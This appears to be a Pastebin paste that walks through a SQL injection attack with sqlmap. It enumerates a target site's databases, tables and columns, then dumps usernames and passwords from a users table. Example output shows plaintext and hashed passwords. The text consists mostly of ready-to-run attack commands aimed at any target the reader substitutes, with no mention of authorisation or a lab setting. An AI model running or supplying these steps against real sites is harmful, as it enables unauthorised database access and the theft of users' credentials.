Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- the first command were going to use will scan the target for vulns
- sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs
- obviously we would replace the url with our targets url, now sqlmap will start
- scanning, in some cases it will ask if you want to skip scans to save time,
- we do not want to skip scans so just type 'n', it may also ask if you want to include
- certain types of scans we always want to say 'y' skipping scans is being lazy and
- sqlmap might say our target is not vuln when because we skipped a few scans that
- contained the vuln we would exploit. so never skip scans and always include all scan
- types when asked.
- sqlmap will output our targets database names in a similar format below.
- if a database contains the "information_schema" db then navigateing through
- the database should be a breeze. however if id does not contain it you will
- end up haveing to brueforce your way through the database to get table names
- and column names.
- +-------------------+
- |information_schema |
- |database_name |
- |test_db |
- +-------------------+
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --table
- this command will list the tables of the database you selected, when you select a database you
- do ot want to select "information_schema" most of the data requires "root" to access or in other
- words you will need to be an admin to read the data.
- +-------------------+
- |products |
- |random_shit |
- |users |
- +-------------------+
- above we have an example of a table list, the primary table we are going to access is the "users"
- table so we type the following:
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns
- this command will access the columns inside the table, the output from sqlmap will look sorta like
- the one below.
- +-------------------+
- |id |
- |user_name |
- |full_name |
- |location |
- |ip_address |
- |last_name |
- |password |
- +-------------------+
- above is an example of what you will see when retrieveing the collumns.
- the main ones we want to access are the ones that contain the username and password,
- the command to access the data in the columns is below.
- i find it easy to open a few new terminal windows and access the usernames and passwords at the
- same time.
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
- sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump
- now the out put will be the same as the others except with usernames
- +-------------------+
- |admin |
- |user1 |
- |user2 |
- +-------------------+
- and there are 2 outcomes for the password output:
- outcome1:
- +-------------------+
- |admin |
- |irrandom |
- |iamhomo69 |
- +-------------------+
- outcome2:
- +--------------------------------+
- |c02b7d24a066adb747fdeb12deb21bfa|
- |96e79218965eb72c92a549dd5a330112|
- |f1981e4bd8a0d6d8462016d2fc6276b3|
- +--------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement